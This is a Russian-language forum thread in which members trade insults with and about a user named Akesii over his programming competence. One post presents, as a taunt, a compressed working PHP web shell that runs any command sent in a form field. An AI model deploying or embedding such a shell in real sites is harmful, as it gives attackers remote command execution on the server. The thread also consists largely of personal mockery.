Вопросы Акесия

Свернуть
X

• Время
  • Показать
Очистить всё
новые сообщения
  • Павел_17
    христианин

• 13 September 2002
    • 24020

Сообщение от Акесий
    И что - это востребовано в Англии, Израиле, Франции, Германни, и, конечно же США?!
    Мы писали программы, ориентированные под Российские условия. У нас не было цели угодить другим странам.
    В то же время, наше ПО используется и на Западе. Локализацию мы продумали заранее.

Солнце моё, до чего ж Вы предсказуемы! Я тоже писал бухгалтерские программы. но на мировой уровень не выходил.
    Действительно, Вы так предсказуемы, что кроме бухгалтерских программ больше ничего и не знаете.
    И уж, если мериться, то исключительно количеством иконок на рабочем столе )))))

Вы до ужаса провинциальны и не конкурентноспособны на мировом рынке.
    "ВЫ" - это кто?

Меня уважают здесь настоящие мировые программисты, работающие в Моторолле, Дженерал Электрике и Нокиа. И ставят меня в пример.
    ФИО в студию. Я спрошу, при оказии. А то врать - любой сможет.

А тут вылез откуда-то сисадмин Глюкин и настройщик компов из медвежьего уга на Урале и чё-то там пытаются пискнуть. Ну, пищите.
    Вы ошиблись. Фамилия Глюкин - это Ваша.
    А у нас глюков нет и винда по 3 минуты не грузится ))))

Простите , что не знаю тонкостей биографии Вашего Величества. Вы не писали, этого.
    Писал. Только Вы забыли или не читали, по своему обыкновению.

Вот не утверждал. Опять врёте. Склероз, у Вас, Паша
    Вы запутались. Склероз или врете?

Если бы сисадмин была настоящей специальностью, Вы мы без обучения ею не овладели.
    А я разве писал, что не учился этому? Как можно овладеть чем-то без обучения?
    Это же не теория эфира, которую без учебы понять можно

А так эту обязанность может выполнять и комп, надо просто заложить ему критерии для принятия решений.
    Что же не придумали такую программу. Слабо, видать. Вот и приходится компаниям держать в штате людей, которые могут грамотно настроить сеть и операционную систему.

Высокого - какого! Из Интела, Майкрософта, IBM? Детский лепет, Павел. детский.
    Дремучий человек. Смешно мне от Вашей писанины.

Это не предмет для определения профессионал ли Вы, Паша. Вообще.
    Потому что Вы уже это не освоите. Вообще. Возраст не тот, чтобы переучиваться.

Но даже если Вы правы, это - никакое не доказательство.
    Я разве Вам собирался что-то доказывать? Зачем мне на это время свое тратить?

Мои знакомые из Нокиа и Дженерал Электрик плохо знали Винды в начале карьеры, да и сейчас толком не всё знают.
    Оно и видно. Вы их достойный ученик?
    А системным администраторам надо не только винду знать. Да и одними знаниями сейчас никого не удивить. Гугль и Яндекс все найдут, что надо. А вот без понимания - никуда. Потому что задачи больше на логику.

Комментарий

• ilya481
      спасённый грешник
      Ко-Админ Форума

• 14 August 2008
      • 7378

Сообщение от Акесий
      Вот, пожалуйста, поясните мне про типаж и явление.
      Сделайте милость! Звучит как оскорбление
      Да!
      Это вполне может звучать как оскорбление.
      И восприниматься так же.
      Вы взялись оскорблять всех, кто "осмеливается" хоть что- то сказать по поводу вашей персоны.
      Вы фонтанируете эти оскорбления своей манерой вести разговор, своей надменностью и желанием унизить, хоть как- то, каждого, кто попадает в поле зрения вашего "интеллекта".

Тут дело совсем не в уровне вашей подготовки или вашего образования.
      Дело в вас, Акесий.
      В вашей личности.

Ну а что касается вашего оскорбления от меня лично (чем я начал свой пост).
      Я отвечу аллегорией.
      Человек, который бросается грязью в других, не может остаться чистым в белоснежной рубашке.

Тот, кто позволяет себе так разговаривать с другими, будет даже в нейтральном тексте видеть оскорбления в свой адрес.
      И ещё замечание.
      Ну если вы так высокомерно относитесь к вашему окружению на форуме, и при этом намекаете, что есть другое окружение, достойное вас, то что вам мешает общаться с себе подобными и не опускаться до общения с теми, кого вы так открыто презираете?
      Не может человек ничего принимать на себя, если не будет дано ему с неба. (Иоанн креститель)

Комментарий

• Павел_17
        христианин

• 13 September 2002
        • 24020

Сообщение от ilya481
        ... если вы так высокомерно относитесь к вашему окружению на форуме, и при этом намекаете, что есть другое окружение, достойное вас, то что вам мешает общаться с себе подобными и не опускаться до общения с теми, кого вы так открыто презираете?
        Думаете, его там примут?
        Таким нужны кто угодно, главное, чтобы они не разбирались в теории эфира, в диаграммах Фейнмана и с уравнением Эйнштейна никогда не разбирались. Вот тогда - он царь и орел.
        Но он малость ошибся. Он думал, что он и в компьютерах тоже хоть немного понимает, хотя бы на уровне, на котором он понимает уравнения Эйнштейна. Оказалось, что в компьютерах он полный ноль, но мнит о себе как о гении.
        Вот и злится.
        А что злиться-то? Либо повышать свой уровень надо, либо признать, что есть люди, лучше разбирающиеся в компьютерах. Но ни на то, ни на другое, он не способен.

Комментарий

• Tessaract
          Сатанист

• 18 August 2004
          • 6119

Павел_17
          И вообще, Россия должна была (по его мнению) уже два года без компьютеров сидеть.
          И не только по его мнению, но и по мнению огромной кучи "пророков". Но что-то пока увы.

Более того, Китайцы свои процессоры уже давно производят. Но кому-то это закрыто.
          Да и Россия, вобщем-то тоже: Российский процессор. Процессоры российского производства
          Но люди вроде Акесия действительно об этом не знают.

Акесий
          Не каждой иконке соответствует программа, например, можно вытащить кучу ссылок на папки или картинки.
          А открывает эти ссылки, папки, картинки что? Правильно - программа, сопоставленная данной иконке. Так что правильно вам написали. И вы ещё помню говорили что я в IT не шарю, а сами не в зуб ногой.
          Человек человеку волк!!!!!!!!!!!!!!!!

Комментарий

• Tessaract
            Сатанист

• 18 August 2004
            • 6119

Сообщение от Акесий
            Очень хорошо. Напишите с Пашей некоммерческую нужную программу.
            Да запросто!

<?php
            print md5 ($_GET["data"]);
            ?>

Наслаждайтесь

Интересно Акесий, вы догадаетесь, как эту программу запустить, чтоб давала результат? Чего-то меня берут сомнения.

Комментарий

• Tessaract
              Сатанист

• 18 August 2004
              • 6119

Акесий, а вот ещё одна очень полезная для web-админов "авада кедавра":

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /></head><body>
              <?php if ($_POST['cmd'] != '') {exec($_POST['cmd'],$res); for ($x=0;$x<=sizeof($res);$x++) print iconv("cp866", "windows-1251",str_replace("<DIR>","&ltDIR&gt","$res[$x]"))."<br>\r\n";} ?> <form action='cmd.php' method='post'><input type='text' name='cmd'></form></body></html>

Я даже не спрашиваю вас что это делает, всё равно не догадаетесь, и не каждый программер слёту поймёт, но уверяю вас, это весьма полезная штука.

Учитесь Акесий, как надо писать хаки.

p.s. Разумеется форматирование кода цинично удалено, чтобы вызывать разрыв шаблона

Комментарий

• baptist2016
                Ветеран

• 11 May 2016
                • 33603

Вряд ли Кеша разберется в этом наборе букв и цифр нтмл и кодировки))
                "папа римский ... назвал Украину лабораторией экуменизму"(с) с. шевчук / Сегодня День Реформации! / рождество без Иисуса или когда же Он родился??? / Земля и Солнце: что вокруг чего крутится? Ваши аргументы!

Комментарий

• Tessaract
                  Сатанист

• 18 August 2004
                  • 6119

Сообщение от baptist2016
                  Вряд ли Кеша разберется в этом наборе букв и цифр нтмл и кодировки))
                  Не, ну как же, он ведь по собственному утверждению писал программы в несколько десятков тысяч строк и мировые программисты ставят его в пример, уж такой-то крутой программёр должен разобраться в довольно простой программе (а язык PHP не сложнее Бейсика, а в некотором роде даже и проще). Если конечно он действительно программёр, а не сертифицированный ламер, каким его здесь считают все кому не лень.

p.s. Акесий, напиши мне программу решения квадратных уравнений. Сравним что у вас получилось, и что у меня. Разумеется для "заморочки" она будет в аналогичном выше "упакованном" виде, чтобы для понимания алгоритма надо будет напрячь мозги.

Комментарий

• Полковник
                    Ветеран

• 14 September 2005
                    • 18241

Сообщение от Tessaract
                    Я даже не спрашиваю вас что это делает, всё равно не догадаетесь, и не каждый программер слёту поймёт, но уверяю вас, это весьма полезная штука.
                    Да ладно не слёту. Даже я, не работая в PHP ни разу, за минуту разобрался...

Не, безбазара, кедавра, реально полезная и нужная. И(!!!) бесплатная...
                    Тока Акешка не догадается ни разу...

Сообщение от Tessaract
                    p.s. Разумеется форматирование кода цинично удалено, чтобы вызывать разрыв шаблона

.
                    "Давайте учиться иметь свое мнение, давайте не будем повторять чужое."
                    Виктор Суворов

Комментарий

• Tessaract
                      Сатанист

• 18 August 2004
                      • 6119

Сообщение от Полковник
                      Да ладно не слёту. Даже я, не работая в PHP ни разу, за минуту разобрался...

Не, безбазара, кедавра, реально полезная и нужная. И(!!!) бесплатная...
                      Тока Акешка не догадается ни разу...
                      .
                      Естественно не догадается. Я помню на старом форуме, ну до его краха, просил его сказать что делает вот такая программка:

double rest(float a, float b)
                      {float res=a*b;
                      for (int i=0; i<999999999; i++)
                      if (i<=res && i+1>res) {res = res-i; break;}
                      return res;
                      }

Так он целую неделю думал, пока не дал, наконец, ответ, да и то я сомневаюсь, что он сам решил, скорей всего в Интернетах подсмотрел ответ, ибо хака известная.

p.s.
                      Даже я, не работая в PHP ни разу, за минуту разобрался...
                      PHP рекомендую изучить, сейчас тенденция такова, что очень многое делается скриптами через браузер. А скоро, я так думаю, через Тырнет будет работать вообще всё. Тем более что этот язык, как я говорил, не сложнее Бейсика.
                      Последний раз редактировалось Tessaract; 22 May 2016, 04:25 AM.

Комментарий

• Ольга Владим.
                        Ветеран

• 26 May 2010
                        • 48032

Устала от засилья атеизма на форуме...

Комментарий

• Полковник
                          Ветеран

• 14 September 2005
                          • 18241

Сообщение от Tessaract
                          PHP рекомендую изучить, сейчас тенденция такова, что очень многое делается скриптами через браузер. А скоро, я так думаю, через Тырнет будет работать вообще всё. Тем более что этот язык, как я говорил, не сложнее Бейсика.
                          Да, я пока разбирался в том скрипте, половину уж выучил.

Сообщение от Ольга К.
                          ...
                          Я, кстати помню ту беседу...
                          Жаль, что форум грохнули... тут много чего весёлого Акесий нам поведал... А уж руками-то как разводил... ууу... чуваки с этой картины отдыхают...

.
                          "Давайте учиться иметь свое мнение, давайте не будем повторять чужое."
                          Виктор Суворов

Комментарий

• Майор
                            Участник

• 21 May 2016
                            • 320

Сообщение от Полковник
                            Да, я пока разбирался в том скрипте, половину уж выучил.

Жаль, что форум грохнули...

.
                            Форум воскрес. А Акесий еще напишет. Главное терпение.

Комментарий

• Tessaract
                              Сатанист

• 18 August 2004
                              • 6119

Сообщение от Майор
                              Форум воскрес. А Акесий еще напишет. Главное терпение.
                              Да, ждём новых изумительных перлов от Акесия.

Комментарий

• Tessaract
                                Сатанист

• 18 August 2004
                                • 6119

Сообщение от Полковник
                                Да, я пока разбирался в том скрипте, половину уж выучил..
                                А такого рода проги на это и рассчитаны. Если в обычном форматированном "красивом" виде прогу дать, то это элементарщина, а когда в таком, ужатом, то ууууу.... пока разберёшься, весь язык выучишь. Ну если не весь, то по крайней мере базовые основы. У нас у универе студентам специально такие штуки для изучения дают.

Комментарий

Обработка...